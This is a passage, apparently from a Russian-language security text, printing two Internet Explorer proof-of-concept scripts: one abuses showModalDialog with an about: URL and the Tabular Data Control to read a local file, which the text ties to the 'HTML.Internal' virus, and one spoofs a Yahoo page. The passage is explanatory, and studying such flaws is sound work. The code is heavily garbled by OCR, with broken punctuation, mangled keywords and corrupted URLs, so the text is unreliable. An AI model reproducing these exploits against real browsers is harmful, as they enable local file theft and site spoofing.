файла, как это было с вирусом HTML.Internal:
<SCRIPT>
s="about:<SCRIPT>a=window. open С view-source: x' );a. document, open (); "+
"a. document, write("<object id='myTDC' width=100height=100"+
"classid="CLSID:333C7BC4-460F-11DO-BC04-0080C7055A83'>"+
"<param name='DataURL' value=' с:/test. txf>"+
"<param name='UseHeader' value=False>"+
"<param name='CharSet' VALUE^iso-SSSO-I^"
"<param name='FieldDelim' value='}'>"+
"<parani name='RowDelim' value='}'>"+
"<param name='TextQualifier' value='}'>"
"</object><torm><textarea datasrc='SmyTDC' datafld='Column1' rows=10 cols=80>"+
"</textarea></form>"); a. document, write"+
"('<SCRIPT>setTimeout("alert(document.forms[0].elements[0].va.lue)",4000)</SCRIPT' ):"+
"a. document, write('>' ); a. document, close(); close ();</"+
"SCRIPT>%01file://c:/";
b=showModalDialog(s);
</SCRIPT>
Использование этой же ошибки в целях подделки сайтов демонстрирует следующий код:
<SCRIPT>
b=showModalDialog(
"about :<SCRIPT>a=window.open(' http://www. yahoo, corn' ); "
+"a. document. writeC <HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD>Любoйhtml-кoд' ); close()</"
+"SCRIPT>%01http://www. yahoo, corn");
</SCRIPT>